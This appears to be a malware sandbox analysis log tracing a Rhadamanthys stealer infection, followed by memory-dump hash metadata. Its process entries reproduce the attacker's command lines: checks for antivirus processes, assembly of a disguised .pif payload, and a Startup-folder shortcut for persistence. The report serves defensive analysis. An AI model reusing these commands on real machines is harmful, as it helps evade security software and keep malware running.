                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:13
                                                                                                                                                    Start time:08:14:13
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                    Imagebase:0x170000
                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:14
                                                                                                                                                    Start time:08:14:13
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:tasklist
                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:15
                                                                                                                                                    Start time:08:14:13
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                    Imagebase:0x170000
                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:16
                                                                                                                                                    Start time:08:14:17
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c md 30253
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:17
                                                                                                                                                    Start time:08:14:17
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:18
                                                                                                                                                    Start time:08:14:17
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c copy /b Conf 30253\m
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:19
                                                                                                                                                    Start time:08:14:17
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:30253\Identification.pif 30253\m
                                                                                                                                                    Imagebase:0x8d0000
                                                                                                                                                    File size:946'784 bytes
                                                                                                                                                    MD5 hash:848164D084384C49937F99D5B894253E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2953940198.00000000088F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 5%, ReversingLabs
                                                                                                                                                    • Detection: 4%, Virustotal, Browse
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:20
                                                                                                                                                    Start time:08:14:18
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping -n 5 localhost
                                                                                                                                                    Imagebase:0x7f0000
                                                                                                                                                    File size:18'944 bytes
                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:23
                                                                                                                                                    Start time:08:14:42
                                                                                                                                                    Start date:21/02/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:false

                                                                                                                                                    Reset < >
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000003.2003937344.00000000061F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_3_61f0000_mshta.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                      • Instruction ID: 04bbfa85f7692fe6ce31a57d65cad234852fc268d32278ed5f81ea11f5514095
                                                                                                                                                      • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000003.2003937344.00000000061F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_3_61f0000_mshta.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                      • Instruction ID: 04bbfa85f7692fe6ce31a57d65cad234852fc268d32278ed5f81ea11f5514095
                                                                                                                                                      • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000003.2003937344.00000000061F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_3_61f0000_mshta.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                      • Instruction ID: 04bbfa85f7692fe6ce31a57d65cad234852fc268d32278ed5f81ea11f5514095
                                                                                                                                                      • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d1a7979b91334eb39aa9bad0bb514eb7dd7c8d180ba614288a561e409a248d19
                                                                                                                                                      • Instruction ID: 76262a4e4efc84151af2d9996b94e244a75bc8fe185bad1c334833e263de6b79
                                                                                                                                                      • Opcode Fuzzy Hash: d1a7979b91334eb39aa9bad0bb514eb7dd7c8d180ba614288a561e409a248d19
                                                                                                                                                      • Instruction Fuzzy Hash: 29924974A012599FDB05DFA8D484A9DFFB2FF89314F258199E844AB361C731ED82CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2c109d3e514f508ff960384b443c798615b255bd4e7063d12f5c5657c56c8230
                                                                                                                                                      • Instruction ID: e4854ce49b6c22eef34ce64904485b8c508dbb4fb174030ab7c42294a90fc235
                                                                                                                                                      • Opcode Fuzzy Hash: 2c109d3e514f508ff960384b443c798615b255bd4e7063d12f5c5657c56c8230
                                                                                                                                                      • Instruction Fuzzy Hash: 97F14C74A00259EFCB15CF98C494AAEBBF2FF88314F258559E805AB355C731ED82CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab4319ee1633986be097694f0e9e758af74ccc415974b07fe1463a7531a6107e
                                                                                                                                                      • Instruction ID: 2fa9b5ba3c21425ae5ca36a30d8701de48c8573aecd07af7e353e09526365d1a
                                                                                                                                                      • Opcode Fuzzy Hash: ab4319ee1633986be097694f0e9e758af74ccc415974b07fe1463a7531a6107e
                                                                                                                                                      • Instruction Fuzzy Hash: AEC10870A092858FC706CF6CC8A49EEBFB1EF46310B194596D854DB2A2C735FC46CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ec58df07ddab861223236d324874f1a6f383e088dcdb5fdd5a2836466d986f7f
                                                                                                                                                      • Instruction ID: 454723226d9e29d6806a89cc8e99279eccf1627c1b5ced7448ca2fe4fef7bc82
                                                                                                                                                      • Opcode Fuzzy Hash: ec58df07ddab861223236d324874f1a6f383e088dcdb5fdd5a2836466d986f7f
                                                                                                                                                      • Instruction Fuzzy Hash: 7951C474A00209EFDB05CFA8D484A9DBBF2FF88314F258559E805AB365C775ED92CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 497f68a32cfbdb3280453763d8435527ac4a437187ff5ad436e0f151f1062120
                                                                                                                                                      • Instruction ID: f0a1315f0d5e87e4b284995cf6961b5a87723e531e6d88821bffad13ef514f7c
                                                                                                                                                      • Opcode Fuzzy Hash: 497f68a32cfbdb3280453763d8435527ac4a437187ff5ad436e0f151f1062120
                                                                                                                                                      • Instruction Fuzzy Hash: F141E534A00219EFDB15DFA8D484A9DFBB2FF88314F248559E804AB365C731ED82CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9f1e274977c46ba8149a8572d5cde846ed48b27e27951a18c3bf9d616d8a37a5
                                                                                                                                                      • Instruction ID: f6cfcffcaacec057f2f274586b696679e0c1b238839785aad424008b40171953
                                                                                                                                                      • Opcode Fuzzy Hash: 9f1e274977c46ba8149a8572d5cde846ed48b27e27951a18c3bf9d616d8a37a5
                                                                                                                                                      • Instruction Fuzzy Hash: 744139B4A006459FCB09CF98C4949AEFBB1FF48310B2586A9D815AB365C736FC51CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4213151d2a3c02f9ef6dfc61617444ae7ff248d5d1e6f4ab0470d59f1912905b
                                                                                                                                                      • Instruction ID: 7da545747b408088d158195b60f1cf75a287295d7b2e93ebe6671b1d0d0bdd0f
                                                                                                                                                      • Opcode Fuzzy Hash: 4213151d2a3c02f9ef6dfc61617444ae7ff248d5d1e6f4ab0470d59f1912905b
                                                                                                                                                      • Instruction Fuzzy Hash: C8412CB4A002459FCB14CF9CC4949AEBBF1EF88310B248659E955EB3A5C336EC41CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ec9105347e4095761e0d728163d44038e6e6b47f10a7b25f7344a6d0b3fe860e
                                                                                                                                                      • Instruction ID: d93669bde838eea2fb7c7efc0f0ba026ef06ed50401f8409b892a5e59a7863be
                                                                                                                                                      • Opcode Fuzzy Hash: ec9105347e4095761e0d728163d44038e6e6b47f10a7b25f7344a6d0b3fe860e
                                                                                                                                                      • Instruction Fuzzy Hash: BF313A74A042499FCB41DF5CC8949AEBBB1FF49310B1584AAD849EB362C735AC41CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e1d8fea04a9930aaddccb1be37cc3c5fcb42ac4541027569a5f70cd5af7fa1e3
                                                                                                                                                      • Instruction ID: 44edadfeb17ba2bf278752b4351be2ea068c87f09c7ca31f76dfc287539e55c9
                                                                                                                                                      • Opcode Fuzzy Hash: e1d8fea04a9930aaddccb1be37cc3c5fcb42ac4541027569a5f70cd5af7fa1e3
                                                                                                                                                      • Instruction Fuzzy Hash: C6313774A042099FCB01DF58C8909AABBB1FF49310B158596E909EB352C735FC51CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 90542a096f50699b985d7c6316c5635c19b0944d6577f1621e73f0e3848c58ac
                                                                                                                                                      • Instruction ID: 23d07e01559aef954c8feb79e15228b94eca1d932308598641b36382e36c7465
                                                                                                                                                      • Opcode Fuzzy Hash: 90542a096f50699b985d7c6316c5635c19b0944d6577f1621e73f0e3848c58ac
                                                                                                                                                      • Instruction Fuzzy Hash: B611F935A04209EFDB05CF98D484A9DBBB2FF88314F289548E804AB361C775E882CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2166193816.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 65e3cf91a028abf886a18547f83143654b84bc44c0ce353763fd02ec2f57738e
                                                                                                                                                      • Instruction ID: 095feec6d8ddfeb761de5cd43e67e45c338324028c0419fa166c7618c4299586
                                                                                                                                                      • Opcode Fuzzy Hash: 65e3cf91a028abf886a18547f83143654b84bc44c0ce353763fd02ec2f57738e
                                                                                                                                                      • Instruction Fuzzy Hash: 5B11CB74A04209EFDB45CBA8D484E9DFBB2FF48314F288559E805AB365C775E982CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2165632835.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4e4d000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 10dc4839232f3d46ec902cc60bb0932ff6db154aae1580750e04e95a60fff365
                                                                                                                                                      • Instruction ID: 0f9b8d3f5cdff0b09ffd651229d1c19f5371f994861877778e257fb7ed364c5a
                                                                                                                                                      • Opcode Fuzzy Hash: 10dc4839232f3d46ec902cc60bb0932ff6db154aae1580750e04e95a60fff365
                                                                                                                                                      • Instruction Fuzzy Hash: 5F015E6140E3C05FD7128B259D94B52BFB4DF83224F1DC1DBE8888F1A3C269984ACB72
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.2165632835.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_4e4d000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 98b8a67a78b6a2dbbcef9bd7b49e4722ad630366f04806378baf6aa0a302f086
                                                                                                                                                      • Instruction ID: 2d5cce92da06c6347bd3cf4399ad391bee5bd8a58b33a0cc5814228ae2312ac9
                                                                                                                                                      • Opcode Fuzzy Hash: 98b8a67a78b6a2dbbcef9bd7b49e4722ad630366f04806378baf6aa0a302f086
                                                                                                                                                      • Instruction Fuzzy Hash: C50126715043409AE7108E29FCC4F67BF98DFC1324F1CC51AEC084B242C378A846DAB1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 673cddaf34e605fac91650a9ee817d95c569fbf0e2b70ae7e11f4e4f03e113c5
                                                                                                                                                      • Instruction ID: a3a2e040ce75ed6bf039e624f47a980d2364cda3fcc843f1f419eda4ba9a3fcd
                                                                                                                                                      • Opcode Fuzzy Hash: 673cddaf34e605fac91650a9ee817d95c569fbf0e2b70ae7e11f4e4f03e113c5
                                                                                                                                                      • Instruction Fuzzy Hash: BB91BF75B017145FEB29EFB484005AFB7B2EF84A04B00892DE55AAF350DF34A906CBD6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2104796926.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_4d50000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8a53b535c7157b0e1d3d262541e4e6e8c2c03fdeea9544f489bba778e6996c8a
                                                                                                                                                      • Instruction ID: fe9b3b382d4c77ea96459ba10f2aeda118d5d3b2a44ebd622c3eeb9568a8b877
                                                                                                                                                      • Opcode Fuzzy Hash: 8a53b535c7157b0e1d3d262541e4e6e8c2c03fdeea9544f489bba778e6996c8a
                                                                                                                                                      • Instruction Fuzzy Hash: E9919E75B017155BEB29EFB484005AFB7B2EF84A04B00892DE55AAF350DF34A906CBD6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q$pi^h$pi^h$pi^h$pi^h$pi^h$|,`h
                                                                                                                                                      • API String ID: 0-2376590843
                                                                                                                                                      • Opcode ID: 1b11b765cfcc3a8ed75212f24295821246d72ae7615ea7bf5d2c50564d947b27
                                                                                                                                                      • Instruction ID: 6566deb474c6e80340684bece024abb5aa8af48c5ca863a8fa1b0c10dfac2af2
                                                                                                                                                      • Opcode Fuzzy Hash: 1b11b765cfcc3a8ed75212f24295821246d72ae7615ea7bf5d2c50564d947b27
                                                                                                                                                      • Instruction Fuzzy Hash: 8F22E8B1710206AFDF249F69C4447AABBE5BFC9321F04807AD525CB281DB31D965C7A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,esq$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                                                      • API String ID: 0-1987180081
                                                                                                                                                      • Opcode ID: 1ff967156eb0c83038c303129dc997a91cabf76be35f238c247ea607f61b8459
                                                                                                                                                      • Instruction ID: 71368203f6558484b57dfd4ef956a654c81179d70e7f765759e35f5f0e88c8ef
                                                                                                                                                      • Opcode Fuzzy Hash: 1ff967156eb0c83038c303129dc997a91cabf76be35f238c247ea607f61b8459
                                                                                                                                                      • Instruction Fuzzy Hash: C791C3B07202069FDF159F698450A6ABBF2AFC9710F14C4BAE8259B351CB31DD51CBB1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q$4']q$4']q
                                                                                                                                                      • API String ID: 0-1785108022
                                                                                                                                                      • Opcode ID: 65381ce988aac7ff0e5b39d25f6aee512b91cc316cb586e0403f6e023c21bd51
                                                                                                                                                      • Instruction ID: 0a94d129136a982db6232b523d636919795a0127f95f605ade45519d61e23fb8
                                                                                                                                                      • Opcode Fuzzy Hash: 65381ce988aac7ff0e5b39d25f6aee512b91cc316cb586e0403f6e023c21bd51
                                                                                                                                                      • Instruction Fuzzy Hash: 200208F1B043569FDF249B68881076BBBE6AFD9311F14C07AD525CB251DB31C8A2C7A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                                      • API String ID: 0-978391646
